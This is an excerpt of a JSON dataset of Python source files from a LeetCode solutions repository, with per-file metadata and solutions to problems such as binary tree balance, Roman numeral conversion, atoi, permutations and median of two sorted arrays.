gkaylsxbmchufidegxkjftccoaufdzhmjjkuchyqkflrqqxwphhxclzqnvy\",\"rufffqpcuzanjhacxqzwhjfelrfeebcxxjcfzuhwtjjeqjgobhmiqrpckuirxkoxttcunlsiudokmuapdoaugpyql\",\"ghlsyiltmhixasrdgdscghfujzcaztmhcxzchkxtufquxjzdorfubnrkotnoobvtaxvhhtcdauxadxdtqloryhema\",\"tcpuaiuxfdgafkdbjdeggxztnqtuwgxpkmlkwhhdkogryjsjmyquypqlhjierfvcthmrowwbkcuknntbnlylcozmz\",\"jqrontjuhaldwmpbiboxxqliqynexzfgrwwerfbbhogecwhkxviwntffrulrtrzknwqhdrilhorjmyumveilzpqsj\",\"cjevlqkjhrmabzissteqpsotdbssrlevwkqhbbqiufkwgsqzowrdpfxsipmaasxxdqgerxoneylktbjhydkpkhjtz\",\"vvbosatihxbgnpklawgeinclatvjcoizjknemimthqzuflghiolqcpbciynmnwmyibcukpqrhpmmduvlijdmagqje\",\"exrcjqklugxjwosocgtycejnjvnpmytswnuffgszmpllgdbikuhmaqbjnoybnttjgnqltjniyyvgbwpnsybsqcddr\",\"dhewanfqdsjoftpdovhmmugkwacydipipvhpimfoerekmtpdrwrdtyqpyspechmrctjnfqdmjhywdnbumsxhqnypi\",\"ntkwhezbnoidrunyulbkmvyevfxkfmsshfrqjsrwgcbxyqxtbbdpybutitenfyhodygoqamwcovagvtiwyzubtqjo\",\"wytugjagsoxsdvurtwxoshkqhgucydruemrkytqqhpkmnedgcdwumintohypmrjqdcadvtvfkfrxjvfmabimjviac\",\"gppxafcdigadbfnjxnsuugwwrihmqjryagxdnaixiicloqunfphzxdxonfdgquerccurecpomrzajunolwqibnzps\",\"cvlybcafytjckxoezrnveegdwqejpvetqprurtzrpltzijdjatehzkkvbqesmimezfasbajqlepvqvfqojzpujkxc\",\"qpqbdwalxtmxeeklvfbqmrgwrvschrgyiwbmtbzqwlpdpbomipdvijtbhngoemoojpcetbwpolufoiswzvrigkjnz\",\"pefesuniwtdapuocpuqxmmxjghpssfskjxodtdnswqsnlgpachzqvyzbhruawmkhlakfdyxzorobzfdcmdujdwlln\",\"fnltzsezelcckdtbrudwahkdbtixgvmnkxgjrniwakalpvogstesaqxemfdsdqgnnoxhbffcsfphdfqvzwnznkdzr\",\"htuzzioohvrmavgikqlqgipcvqrfwsyfmtendsdkqxysshcdxpvdxmhsezzatyhhtlvwgaiyxiqspvvmksrigzcka\",\"clvcudxgavoadmalesbzppmhhupiyzicmfehidpiydjbrlpxdqzshlbohqwfpgicmolwsafqdqswbhtezuyifzxmr\",\"vuiecmsqxoixtbcjvymeuqdoqnwrkkiiermgfezdsjaokfxffkjzcoqtcokoyvwdokltqkwjuzxggwoliznlofgst\",\"sirpfudrgxisvtowqvcoloxkdkyiqsbkbsaipdzxcjpyceuubzjmngwqqxairbusvuakachcnzcqdzkgytunbsftp\",\"fbjgwbdseosixxvwzlbyyhyrdlvwsonxswfqyjkezdowajtbxuaveaoholdgatgupnmpwwvxzjubtpdslfnrfdztp\"], 
\"crzilpvxgu\"]\n\na4 = [a4s[1], []]\nfor i in range(len(a4s[0])):\n a4[1].append([])\n for c in a4s[0][i]:\n a4[1][i].append(c)\nal = [a1, a2, a3, a4]\nfor k in range(len(al)):\n a = al[k]\n print(a[0], len(a[1]), len(a[1][0]))\n #for i in range(len(a[1])):\n # print(a[1][i])\n print(Solution.exist(Solution(), a[1], a[0]))"
},
{
"alpha_fraction": 0.570588231086731,
"alphanum_fraction": 0.5764706134796143,
"avg_line_length": 31.69230842590332,
"blob_id": "bd4aa3e5ac8cfa8a9f3db714d3d52437cdd4e7b8",
"content_id": "60eb9711dfcad6ba540ab630219bf16619762c9e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 850,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 26,
"path": "/Balanced Binary Tree.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return a boolean\n def isBalanced(self, root):\n '''Given a binary tree, determine if it is height-balanced.\n\nFor this problem, a height-balanced binary tree is defined as a binary tree in which the depth of the two subtrees of every node never differ by more than 1. '''\n return self.dfs(root)[0]\n\n def dfs(self, node):\n if node is None:\n return [0, True]\n l, lb = self.dfs(node.left)\n r, rb = self.dfs(node.right)\n max_height = max(l, r) + 1\n if abs(l - r) > 1:\n return [max_height, False]\n else:\n return [max_height, True and lb and rb]\n"
},
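A hypothetical driver for the Balanced Binary Tree record above; TreeNode is again a stand-in for the judge's definition. A left chain of depth 2 against an empty right subtree fails the check:

    class TreeNode:  # stand-in for the OJ-supplied node type
        def __init__(self, x):
            self.val = x
            self.left = self.right = None

    root = TreeNode(1)
    root.left = TreeNode(2)
    root.left.left = TreeNode(3)
    print(Solution().isBalanced(root))  # False: subtree depths differ by 2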
{
"alpha_fraction": 0.4844290614128113,
"alphanum_fraction": 0.5201845169067383,
"avg_line_length": 23.799999237060547,
"blob_id": "4acbe899e2d75150ddd34648ad7c5f2c5009c2a8",
"content_id": "d9acb29a83559b6f0d85585d7c03d5d845eca82e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 867,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 35,
"path": "/Find Minimum in Rotated Sorted Array II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param num, a list of integer\n # @return an integer\n def findMin(self, num):\n '''\n Follow up for \"Find Minimum in Rotated Sorted Array\":\n What if duplicates are allowed?\n\n Would this affect the run-time complexity? How and why?\n\nSuppose a sorted array is rotated at some pivot unknown to you beforehand.\n\n(i.e., 0 1 2 4 5 6 7 might become 4 5 6 7 0 1 2).\n\nFind the minimum element.\n\nThe array may contain duplicates.\n '''\n l, r = 0, len(num) - 1\n while l < r:\n mid = (l + r) // 2\n if num[mid] == num[r]:\n r -= 1\n continue\n if num[mid] < num[r]:\n r = mid\n else:\n l = mid + 1\n return num[l]\n\na1 = [1, 1, 2, 0, 1, 1]\na2 = [1, 3, 3]\na = a2\nprint(len(a), a)\nprint(Solution.findMin(Solution(), a))"
},
{
"alpha_fraction": 0.4215053617954254,
"alphanum_fraction": 0.47096773982048035,
"avg_line_length": 26.382352828979492,
"blob_id": "c66039d3a2402894fbcce7055d4ac8c9d7813a71",
"content_id": "c0d9c939ea1a1bbd94d4d482660486614ba6a32d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 930,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 34,
"path": "/Count and Say.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a string\n def countAndSay(self, n):\n '''\n The count-and-say sequence is the sequence of integers beginning as follows:\n1, 11, 21, 1211, 111221, ...\n\n1 is read off as \"one 1\" or 11.\n11 is read off as \"two 1s\" or 21.\n21 is read off as \"one 2, then one 1\" or 1211.\n\nGiven an integer n, generate the nth sequence.\n\nNote: The sequence of integers will be represented as a string. \n '''\n s = '1'\n if n == 1:\n return s\n\n for i in range(n - 1):\n k = 1\n next = ''\n for i in range(1, len(s)):\n if s[i] == s[i - 1]:\n k += 1\n else:\n next += chr(k + ord('0')) + s[i - 1]\n k = 1\n next += chr(k + ord('0')) + s[len(s) - 1]\n s = next\n return s\n\nfor i in range(10):\n print(Solution.countAndSay(Solution(), i))"
},
{
"alpha_fraction": 0.616782009601593,
"alphanum_fraction": 0.621107280254364,
"avg_line_length": 35.15625,
"blob_id": "0f956b49ba8fe565d8cb59fecb7c9d6bc9453dee",
"content_id": "fd1caca630f820f05de0d94330eda0e7752bb2ae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1156,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 32,
"path": "/Validate Binary Search Tree.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return a boolean\n def isValidBST(self, root):\n ''' Given a binary tree, determine if it is a valid binary search tree (BST).\n\nAssume a BST is defined as follows:\n\n The left subtree of a node contains only nodes with keys less than the node's key.\n The right subtree of a node contains only nodes with keys greater than the node's key.\n Both the left and right subtrees must also be binary search trees.\n\nconfused what \"{1,#,2,3}\" means? > read more on how binary tree is serialized on OJ.'''\n return self.validBST(root, 0, 0, False, False)\n\n def validBST(self, node, l, r, lv, rv):\n if node is None:\n return True\n if lv and node.val <= l:\n return False\n if rv and node.val >= r:\n return False\n lchild = self.validBST(node.left, l, node.val, lv, True)\n rchild = self.validBST(node.right, node.val, r, True, rv)\n return lchild and rchild"
},
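A small sketch for the Validate Binary Search Tree record above (TreeNode stand-in assumed, as before); node 6 sits in the right subtree of 10, violating the lower bound the recursion threads down:

    class TreeNode:  # stand-in for the OJ-supplied node type
        def __init__(self, x):
            self.val = x
            self.left = self.right = None

    root = TreeNode(10)
    root.left, root.right = TreeNode(5), TreeNode(15)
    root.right.left = TreeNode(6)  # 6 < 10 inside the right subtree
    print(Solution().isValidBST(root))  # False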
{
"alpha_fraction": 0.35316336154937744,
"alphanum_fraction": 0.384324848651886,
"avg_line_length": 22.04347801208496,
"blob_id": "743b3a14de71bec6ea33c6cd23caee192f20dd7b",
"content_id": "4921aee0483593009d86e88e830a9f602a633a9d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1059,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 46,
"path": "/Spiral Matrix II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a list of lists of integer\n def generateMatrix(self, n):\n '''\n Given an integer n, generate a square matrix filled with elements from 1 to n2 in spiral order.\n\nFor example,\nGiven n = 3,\nYou should return the following matrix:\n\n[\n [ 1, 2, 3 ],\n [ 8, 9, 4 ],\n [ 7, 6, 5 ]\n]\n '''\n l, r, u, d = 0, n - 1, 0, n - 1\n m = [[0] * n for row in range(n)]\n k = 0\n while l <= r and u <= d:\n for i in range(l, r):\n k += 1\n m[u][i] = k\n for i in range(u, d + 1):\n k += 1\n m[i][r] = k\n if l == r or u == d:\n break\n for i in range(r - 1, l, -1):\n k += 1\n m[d][i] = k\n for i in range(d, u, -1):\n k += 1\n m[i][l] = k\n l += 1\n r -= 1\n u += 1\n d -= 1\n return m\n\nn1 = 5\nn = n1\nprint(n)\nm = Solution.generateMatrix(Solution(), n)\nfor row in m:\n print(row)"
},
{
"alpha_fraction": 0.35620439052581787,
"alphanum_fraction": 0.41605839133262634,
"avg_line_length": 33.25,
"blob_id": "4ca772f6ce8bc3b762146d77315f82be45e3bc74",
"content_id": "29a75db6def567238470b91ac3860390d667b83c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 685,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 20,
"path": "/Roman to Integer.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return an integer\n def romanToInt(self, s):\n '''\n Given a roman numeral, convert it to an integer.\n\nInput is guaranteed to be within the range from 1 to 3999.\n '''\n dic = [[\"M\", 1000], [\"CM\", 900], [\"D\", 500], [\"CD\", 400], [\"C\", 100],\n [\"XC\", 90], [\"L\", 50], [\"XL\", 40], [\"X\", 10],\n [\"IX\", 9], [\"V\", 5], [\"IV\", 4], [\"I\", 1]]\n index = 0\n t = 0\n num = 0\n while index < len(dic) and t < len(s):\n while s[t:t + len(dic[index][0])] == dic[index][0]:\n num += dic[index][1]\n t += len(dic[index][0])\n index += 1\n return num\n"
},
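A quick local check for the Roman to Integer record above; the table is scanned from the largest token down, so subtractive pairs like CM and IV are matched before their single-letter prefixes:

    s = Solution()
    print(s.romanToInt("MCMXCIV"))  # 1994 = 1000 + 900 + 90 + 4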
{
"alpha_fraction": 0.39862069487571716,
"alphanum_fraction": 0.43586206436157227,
"avg_line_length": 21,
"blob_id": "a73cdf790a6e33ef0358b01fcc85b86d22868b66",
"content_id": "1d905d2bcde33f8d494cbed084a6649c8e6c2c33",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 725,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 33,
"path": "/Pascal's Triangle.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a list of lists of integers\n def generate(self, numRows):\n '''Given numRows, generate the first numRows of Pascal's triangle.\n\nFor example, given numRows = 5,\nReturn\n\n[\n [1],\n [1,1],\n [1,2,1],\n [1,3,3,1],\n [1,4,6,4,1]\n]\n'''\n if numRows == 0:\n return []\n res = [[1]]\n for i in range(1, numRows):\n ithrow = []\n for j in range(i + 1):\n x = 0\n if j < i:\n x = res[i - 1][j]\n if j > 0:\n x += res[i - 1][j - 1]\n ithrow.append(x)\n res.append(ithrow)\n return res\n\nnum = 10\nprint(Solution.generate(Solution(), num))"
},
{
"alpha_fraction": 0.5142180323600769,
"alphanum_fraction": 0.5373222827911377,
"avg_line_length": 32.09803771972656,
"blob_id": "ac1034028c8499681321515eb904e8dd1f60571c",
"content_id": "90a9a864223819f879315ce6133e5b1a024dbe6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1688,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 51,
"path": "/Maximal Rectangle.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param matrix, a list of lists of 1 length string\n # @return an integer\n def maximalRectangle(self, matrix):\n '''\n Given a 2D binary matrix filled with 0's and 1's, find the largest rectangle containing all ones and return its area. \n '''\n m = len(matrix)\n if m == 0:\n return 0\n n = len(matrix[0])\n height = [[0] * n for row in range(m)]\n for i in range(m):\n for j in range(n):\n k = ord(matrix[i][j]) - ord('0')\n height[i][j] = (height[i - 1][j] + 1) * k\n maximum = 0\n for i in range(m):\n maximum = max(maximum, self.largestRectangleArea(height[i]))\n return maximum\n\n # @param height, a list of integer\n # @return an integer\n def largestRectangleArea(self, height):\n '''\n Given n non-negative integers representing the histogram's bar height where the width of each bar is 1, find the area of largest rectangle in the histogram.\n\n\nAbove is a histogram where width of each bar is 1, given height = [2,1,5,6,2,3].\n\n\nThe largest rectangle is shown in the shaded area, which has area = 10 unit.\n\nFor example,\nGiven height = [2,1,5,6,2,3],\nreturn 10.\n '''\n n = len(height) + 1\n height.append(-1)\n stack = [[-1, -1]]\n maximum = 0\n for i in range(n):\n last = stack.pop()\n k = i\n while height[i] < last[0]:\n maximum = max(maximum, (i - last[1]) * last[0])\n k = last[1]\n last = stack.pop()\n stack.append(last)\n stack.append([height[i], k])\n return maximum\n"
},
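A hypothetical driver for the Maximal Rectangle record above (plain strings index the same way as the expected lists of one-character strings); each row's running column heights feed the histogram routine:

    grid = ["10100",
            "10111",
            "11111",
            "10010"]
    print(Solution().maximalRectangle(grid))  # 6: the 2x3 block of ones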
{
"alpha_fraction": 0.47999998927116394,
"alphanum_fraction": 0.5057142972946167,
"avg_line_length": 24.962963104248047,
"blob_id": "916a89acb3dd6663fc3b70ed597e8847c80fba1e",
"content_id": "70627ea2d24af5abb1bea286eb73bbb777522b6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 700,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 27,
"path": "/Pascal's Triangle II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a list of integers\n def getRow(self, rowIndex):\n '''Given an index k, return the kth row of the Pascal's triangle.\n\nFor example, given k = 3,\nReturn [1,3,3,1].\n\nNote:\nCould you optimize your algorithm to use only O(k) extra space?\n'''\n rowIndex += 1\n if rowIndex == 0:\n return []\n ithrow = [0] * rowIndex\n for i in range(0, rowIndex):\n ithrow[i] = 1\n for j in range(i - 1, -1, -1):\n x = ithrow[j]\n if j > 0:\n x += ithrow[j - 1]\n ithrow[j] = x\n return ithrow\n\nnum = 2\nfor i in range(10):\n print(Solution.getRow(Solution(), i))"
},
{
"alpha_fraction": 0.4737499952316284,
"alphanum_fraction": 0.4925000071525574,
"avg_line_length": 27.60714340209961,
"blob_id": "ddb10eac20a23ee576de2d939eb4611fff89e1ee",
"content_id": "f665780d6cdd02aa8f857c75cb1f1cc3556cc8b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 800,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 28,
"path": "/Plus One.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param digits, a list of integer digits\n # @return a list of integer digits\n def plusOne(self, digits):\n '''\n Given a non-negative number represented as an array of digits, plus one to the number.\n\nThe digits are stored such that the most significant digit is at the head of the list.\n '''\n if len(digits) == 0:\n res = [1]\n return res\n digits.reverse()\n res = digits\n res[0] += 1\n i = 0\n while i < len(res) and res[i] > 9:\n res[i] -= 10\n if i < len(res) - 1:\n res[i + 1] += 1\n else:\n res.append(1)\n break\n i += 1\n res.reverse()\n return res\n\nprint(Solution.plusOne(Solution(), [0, 1]))"
},
{
"alpha_fraction": 0.45279502868652344,
"alphanum_fraction": 0.4708074629306793,
"avg_line_length": 29.980770111083984,
"blob_id": "b9abdad09acd0a705628828cd7ba06d06b60ab88",
"content_id": "dfcb6574b427d38a269cc4e1edbe8b2175c68b83",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1610,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 52,
"path": "/Word Break II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param s, a string\n # @param dict, a set of string\n # @return a list of strings\n def wordBreak(self, s, dict):\n ''' Given a string s and a dictionary of words dict, add spaces in s to construct a sentence where each word is a valid dictionary word.\n\nReturn all such possible sentences.\n\nFor example, given\ns = \"catsanddog\",\ndict = [\"cat\", \"cats\", \"and\", \"sand\", \"dog\"].\n\nA solution is [\"cats and dog\", \"cat sand dog\"]. '''\n mlen = 0\n for word in dict:\n mlen = max(len(word), mlen)\n slen = len(s)\n dp = list(range(slen + 1))\n dp[slen] = [slen]\n for i in range(slen - 1, -1, -1):\n dp[i] = []\n for j in range(i, min(i + mlen, slen)):\n if s[i:j + 1] in dict and len(dp[j + 1]) > 0:\n dp[i].append(j + 1)\n res = []\n if len(dp[0]) == 0:\n return res\n self.dfs(s, dp, 0, slen, [], res)\n return res\n\n def dfs(self, s, dp, cur, n, curpos, res):\n if cur == n:\n s1 = s\n nowplus = 0\n for pos in curpos:\n if pos != 0 and pos != n:\n s1 = s1[:pos + nowplus] + ' ' + s1[pos + nowplus:]\n nowplus += 1\n res.append(s1)\n return\n for pos in dp[cur]:\n curpos.append(pos)\n self.dfs(s, dp, pos, n, curpos, res)\n curpos.pop()\n\nA = ['1', '2', '3', '3', '2', '1', '4', '5', '4']\ndict = [\"cat\", \"cats\", \"and\", \"sand\", \"dog\"]\na = 'catsanddog'\nso = Solution()\nres = so.wordBreak(a, dict)\nprint(res)"
},
{
"alpha_fraction": 0.5780553221702576,
"alphanum_fraction": 0.6101694703102112,
"avg_line_length": 41.32075500488281,
"blob_id": "2c172f425d366baa98304cdb9a2b9ea0d8fc370f",
"content_id": "18d5c288ee18fa86d761aee1887518b9f46849d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2242,
"license_type": "no_license",
"max_line_length": 294,
"num_lines": 53,
"path": "/String to Integer (atoi).py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return an integer\n def atoi(self, str):\n '''\n Implement atoi to convert a string to an integer.\n\nHint: Carefully consider all possible input cases. If you want a challenge, please do not see below and ask yourself what are the possible input cases.\n\nNotes: It is intended for this problem to be specified vaguely (ie, no given input specs). You are responsible to gather all the input requirements up front.\n\nspoilers alert... click to show requirements for atoi.\nRequirements for atoi:\n\nThe function first discards as many whitespace characters as necessary until the first non-whitespace character is found. Then, starting from this character, takes an optional initial plus or minus sign followed by as many numerical digits as possible, and interprets them as a numerical value.\n\nThe string can contain additional characters after those that form the integral number, which are ignored and have no effect on the behavior of this function.\n\nIf the first sequence of non-whitespace characters in str is not a valid integral number, or if no such sequence exists because either str is empty or it contains only whitespace characters, no conversion is performed.\n\nIf no valid conversion could be performed, a zero value is returned. If the correct value is out of the range of representable values, INT_MAX (2147483647) or INT_MIN (-2147483648) is returned.\n '''\n s = str.strip()\n sign = 1\n flag = 0\n res = 0\n for c in s:\n if c == '+':\n if flag != 0:\n return 0\n sign = 1\n flag = 1\n elif c == '-':\n if flag != 0:\n return 0\n sign = -1\n flag = 1\n elif ord(c) in range(ord('0'), ord('9') + 1):\n res = res * 10 + ord(c) - ord('0')\n flag = 2\n else:\n if flag != 2:\n return 0\n else:\n break\n if sign == 1:\n return min(res * sign, 2147483647)\n else:\n return max(res * sign, -2147483648)\n\ns0 = \"120030221\"\ns = s0\nprint(len(s), s)\nprint(Solution.atoi(Solution(), s))"
},
{
"alpha_fraction": 0.48563218116760254,
"alphanum_fraction": 0.517241358757019,
"avg_line_length": 28,
"blob_id": "85e53eb63d530f7e8ccf53f446f0aaebeefb1917",
"content_id": "c634a4759e0c679e7929f2804c33b8dfb4fb1289",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 696,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 24,
"path": "/Permutations.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param num, a list of integer\n # @return a list of lists of integers\n def permute(self, num):\n '''\n Given a collection of numbers, return all possible permutations.\n\nFor example,\n[1,2,3] have the following permutations:\n[1,2,3], [1,3,2], [2,1,3], [2,3,1], [3,1,2], and [3,2,1]. \n '''\n res = []\n self.dfs(num, [], res)\n return res\n\n def dfs(self, num, nowlist, res):\n if len(num) == 0:\n res.append(list(nowlist))\n return\n for i in range(len(num)):\n nowlist.append(num[i])\n del num[i]\n self.dfs(num, nowlist, res)\n num.insert(i, nowlist.pop())\n"
},
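A minimal usage sketch for the Permutations record above; the del/insert pair restores num after each branch, so the input list is left intact:

    s = Solution()
    nums = [1, 2, 3]
    print(s.permute(nums))
    # [[1, 2, 3], [1, 3, 2], [2, 1, 3], [2, 3, 1], [3, 1, 2], [3, 2, 1]]
    print(nums)  # [1, 2, 3] -- unchanged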
{
"alpha_fraction": 0.5271629691123962,
"alphanum_fraction": 0.5271629691123962,
"avg_line_length": 26.66666603088379,
"blob_id": "22636dbb4f7a77f284eac8147a755674f52d67f8",
"content_id": "e4004405798544b19ff496ed8eeaf81159253013",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 497,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 18,
"path": "/Reverse Words in a String.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param s, a string\n # @return a string\n def reverseWords(self, s):\n \"\"\" Given an input string, reverse the string word by word.\n\nFor example,\nGiven s = \"the sky is blue\",\nreturn \"blue is sky the\". \"\"\"\n strs = s.split(' ')\n dic = []\n for str in strs:\n dic.append(str)\n dic_rev = [str for str in dic if str != '']\n dic_rev.reverse()\n #print(dic_rev)\n res = \" \".join(dic_rev).strip(' ')\n return res"
},
{
"alpha_fraction": 0.3957826495170593,
"alphanum_fraction": 0.41443634033203125,
"avg_line_length": 29.09756088256836,
"blob_id": "8e88afe648064e07e8c4dc6c1202a8bac0cec2da",
"content_id": "d8ee1ad6f4f5730df10865ea6a56608209abb64b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1233,
"license_type": "no_license",
"max_line_length": 182,
"num_lines": 41,
"path": "/Longest Palindromic Substring.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a string\n def longestPalindrome(self, s):\n '''\n Given a string S, find the longest palindromic substring in S. You may assume that the maximum length of S is 1000, and there exists one unique longest palindromic substring.\n '''\n if s == s[::-1]:\n return s\n last = -1\n lens = 0\n for i in range(2):\n l = i\n r = len(s)\n if r % 2 == 1 - i:\n r -= 1\n while l < r:\n mid = (l + r) // 2\n if mid % 2 == 1 - i:\n mid += 1\n start = self.checkPalindromic(s, mid)\n #print(l, r, mid, start)\n if start != -1:\n l = mid\n if mid > lens:\n lens = mid\n last = start\n else:\n r = mid - 2\n return s[last:last + lens]\n\n def checkPalindromic(self, s, l):\n for i in range(len(s) - l + 1):\n if s[i:i + l] == s[i:i + l][::-1]:\n return i\n return -1\n\ns0 = \"abcddcba\"\ns1 = \"abadd\"\ns = s1\nprint(len(s), s)\nprint(Solution.longestPalindrome(Solution(), s))"
},
{
"alpha_fraction": 0.4380090534687042,
"alphanum_fraction": 0.46787330508232117,
"avg_line_length": 31.52941131591797,
"blob_id": "7013a8cde90c6f411724d6dfb748a6624163bf7b",
"content_id": "c056118a64f07223a6ae73d80a920124b0365670",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1105,
"license_type": "no_license",
"max_line_length": 174,
"num_lines": 34,
"path": "/Median of Two Sorted Arrays.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a float\n def findMedianSortedArrays(self, A, B):\n '''There are two sorted arrays A and B of size m and n respectively. Find the median of the two sorted arrays. The overall run time complexity should be O(log (m+n)).\n '''\n la = len(A)\n lb = len(B)\n l = la + lb\n if l % 2 == 1:\n return self.findKth(A, la, B, lb, l // 2 + 1)\n else:\n return (self.findKth(A, la, B, lb, l // 2) + self.findKth(A, la, B, lb, l // 2 + 1)) * 0.5\n return self.findMedian(A, la, B, lb)\n\n def findKth(self, A, la, B, lb, k):\n if la == 0:\n return B[k - 1]\n if lb == 0:\n return A[k - 1]\n if k == 1:\n return min(A[0], B[0])\n i = min(k // 2, la)\n j = min(k // 2, lb)\n if A[i - 1] > B[j - 1]:\n return self.findKth(A, la, B[j:], lb - j, k - j)\n else:\n return self.findKth(A[i:], la - i, B, lb, k - i)\n\nA = [0, 10]\nB = [1.1, 2.1, 3.2]\nx = [[], [2,3]]\nso = Solution()\nprint(x)\nprint(so.findMedianSortedArrays(x[0], x[1]))"
},
{
"alpha_fraction": 0.3958333432674408,
"alphanum_fraction": 0.4166666567325592,
"avg_line_length": 21.04166603088379,
"blob_id": "e7c82bc16bd0ca9fab62ae49a5dcc91b37564a48",
"content_id": "2e89d27fb97c2bc53b654c39dc05cbe0979f8f54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 528,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 24,
"path": "/Sqrt(x).py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param x, an integer\n # @return an integer\n def sqrt(self, x):\n '''\n Implement int sqrt(int x).\n\nCompute and return the square root of x.\n '''\n l, r = 0, x\n while l < r:\n mid = (l + r) // 2\n if mid * mid <= x < (mid + 1) * (mid + 1):\n return mid\n if mid * mid > x:\n r = mid - 1\n else:\n l = mid + 1\n return l\n\nn1 = 111\nn = n1\nprint(n)\nprint(Solution.sqrt(Solution(), n))"
},
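The binary search above brackets the answer; Newton's iteration reaches the same floor square root in a handful of steps. A standalone sketch for comparison (the helper name is mine, not from the file):

def isqrt_newton(x):
    # Newton's method on f(g) = g*g - x with integer division; starting at
    # x (>= sqrt(x) for x >= 1), the sequence decreases to floor(sqrt(x)).
    if x < 2:
        return x
    g = x
    while g * g > x:
        g = (g + x // g) // 2
    return g

for n in range(10000):
    assert isqrt_newton(n) ** 2 <= n < (isqrt_newton(n) + 1) ** 2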
{
"alpha_fraction": 0.5968841314315796,
"alphanum_fraction": 0.6290165781974792,
"avg_line_length": 28.342857360839844,
"blob_id": "df6f78fe6ec57291bdc89dda377f053b9cc5b173",
"content_id": "56c103319f53abf5eb9da6019f68cef8168a2a87",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1027,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 35,
"path": "/Sum Root to Leaf Numbers.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return an integer\n def sumNumbers(self, root):\n '''Given a binary tree containing digits from 0-9 only, each root-to-leaf path could represent a number.\n\nAn example is the root-to-leaf path 1->2->3 which represents the number 123.\n\nFind the total sum of all root-to-leaf numbers.\n\nFor example,\n\n 1\n / \\\n 2 3\n\nThe root-to-leaf path 1->2 represents the number 12.\nThe root-to-leaf path 1->3 represents the number 13.\n\nReturn the sum = 12 + 13 = 25. '''\n return self.dfs(root, 0)\n\n def dfs(self, curnode, curnum):\n if curnode is None:\n return 0\n if curnode.left is None and curnode.right is None:\n return curnum * 10 + curnode.val\n return self.dfs(curnode.left, curnum * 10 + curnode.val) + self.dfs(curnode.right, curnum * 10 + curnode.val)\n"
},
{
